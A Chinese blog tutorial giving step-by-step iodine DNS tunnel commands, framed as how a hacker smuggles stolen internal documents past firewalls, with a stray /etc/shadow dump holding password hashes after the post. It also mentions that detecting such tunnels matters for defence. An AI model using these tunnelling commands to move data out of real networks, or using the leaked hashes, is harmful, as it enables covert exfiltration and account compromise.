DNS隧道技术iodine简介

黑客成功入侵一台内网服务器之后,获取了企业密级文档,为了躲避内网日志监控系统,为了穿透内网的防火墙策略,选择一种秘密传输的加密隧道。

以下是我的实验:通过9步操作,成功的通过dns加密隧道建立了ssh加密连接。检测dns隧道是当前态势感知系统必不可少的功能模块。

第一步:添加一条NS记录

我这里的设置是 dns.hackbiji.top指向 dnsns.hackbiji.top,想要解析 dns.hackbiji.top这个子域名,就需要去访问 dnsns.hackbiji.top这个域名服务器

第二步:添加一条A记录

将域名服务器解析到咱们的控制的公网服务器IP地址,我的域名服务器是 dnsns.hackbiji.top,对应的公网IP地址是 96.45.188.252

第三步:通过iodine建立DNS隧道

  • -f 前台显示
  • -P 设置通信密码(我的密码是hackbijipasswd)
  • 10.0.0.1 (我设置的服务器私有网址,也可以设置为其他地址)
  • dnsns.hackbiji.top (我的域名,也可以设置为dns.hackbiji.top
iodined -fP hackbijipasswd 10.0.0.1 dnsns.hackbji.top
或
iodined -fP hackbijipasswd 10.0.0.1 dns.hackbji.top

第四步:查看服务器IP地址

  • 多了一个dns0接口,IP地址是咱们设置的10.0.0.1

第五步:本地客户端连接服务器

  • -fP hackbijipasswd 前台显示,并设置密码(hackbijipasswd)
  • 96.45.188.252 我的服务器IP地址
  • dnsns.hackbiji.top 我的域名(必须和服务器设置的域名保持一致)
iodine -fP hackbjipasswd 96.45.188.252 dnsns.hackbiji.top
或
iodine -fP hackbjipasswd 96.45.188.252 dns.hackbiji.top

第六步:查看本地客户端IP地址

  • 多了一个dns0接口,并且IP地址是自动生成和服务器一个网段的10.0.0.2

第七步:从本地Ping通服务器10.0.0.1

  • 这时我们的DNS隧道建立成功了

第八步:查看本地路由

  • 访问10.0.0.0网段的流量都会走dns0隧道接口

第九步:从本地dns0隧道登陆远程服务器

  • ssh穿越dns0隧道,成功登陆远程服务器

最后,DNS隧道抓包:

root@ubuntu:~# cat /etc/resolv.conf 
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 1.0.0.1
nameserver 8.8.8.8
nameserver 1.1.1.1

服务端dns0接口数据:

服务端eth0接口数据:

DNS请求和应答,都是通过eth0接口收发包的。

如果发生在内网,你无法访问外网IP(96.45.188.252)的时候,可以去掉IP地址,直接通过内网的DNS服务器帮你请求,依然能达到建立隧道的效果。

iodine -fP hackbjipasswd dnsns.hackbiji.top
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
root:$6$RMpgG8z.$GrGzDK0J1/uXc/Z2WIp6WgIYEB6Bi/Sw2aCc86U2E.BK80mszROf4K1ZB172DOQzgRb6U/2jGPh/8rwXQsbM3/:17277:0:99999:7::: daemon:*:17272:0:99999:7::: bin:*:17272:0:99999:7::: sys:*:17272:0:99999:7::: sync:*:17272:0:99999:7::: games:*:17272:0:99999:7::: man:*:17272:0:99999:7::: lp:*:17272:0:99999:7::: mail:*:17272:0:99999:7::: news:*:17272:0:99999:7::: uucp:*:17272:0:99999:7::: proxy:*:17272:0:99999:7::: www-data:*:17272:0:99999:7::: backup:*:17272:0:99999:7::: list:*:17272:0:99999:7::: irc:*:17272:0:99999:7::: gnats:*:17272:0:99999:7::: nobody:*:17272:0:99999:7::: systemd-timesync:*:17272:0:99999:7::: systemd-network:*:17272:0:99999:7::: systemd-resolve:*:17272:0:99999:7::: systemd-bus-proxy:*:17272:0:99999:7::: _apt:*:17272:0:99999:7::: mysql:!:17272:0:99999:7::: epmd:*:17272:0:99999:7::: Debian-exim:!:17272:0:99999:7::: uuidd:*:17272:0:99999:7::: rwhod:*:17272:0:99999:7::: redsocks:!:17272:0:99999:7::: usbmux:*:17272:0:99999:7::: miredo:*:17272:0:99999:7::: Debian-snmp:!:17272:0:99999:7::: ntp:*:17272:0:99999:7::: stunnel4:!:17272:0:99999:7::: sslh:!:17272:0:99999:7::: rtkit:*:17272:0:99999:7::: postgres:*:17272:0:99999:7::: dnsmasq:*:17272:0:99999:7::: messagebus:*:17272:0:99999:7::: iodine:*:17272:0:99999:7::: arpwatch:!:17272:0:99999:7::: couchdb:*:17272:0:99999:7::: avahi:*:17272:0:99999:7::: sshd:*:17272:0:99999:7::: colord:*:17272:0:99999:7::: saned:*:17272:0:99999:7::: speech-dispatcher:!:17272:0:99999:7::: pulse:*:17272:0:99999:7::: king-phisher:*:17272:0:99999:7::: Debian-gdm:*:17272:0:99999:7::: dradis:*:17272:0:99999:7::: beef-xss:*:17272:0:99999:7::: xrdp:!:17472:0:99999:7::: lightdm:*:17472:0:99999:7::: ctf:$6$d1Y17YhS$P1G.pKFO6VKvKx.y0H7nP5kXAHUAhj6hYroEA.ThT1/kErw37IhVclt.UWCFXrfq/sEZk1jhb52KlPWidJKpp0:17473:0:99999:7:::
07-13

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值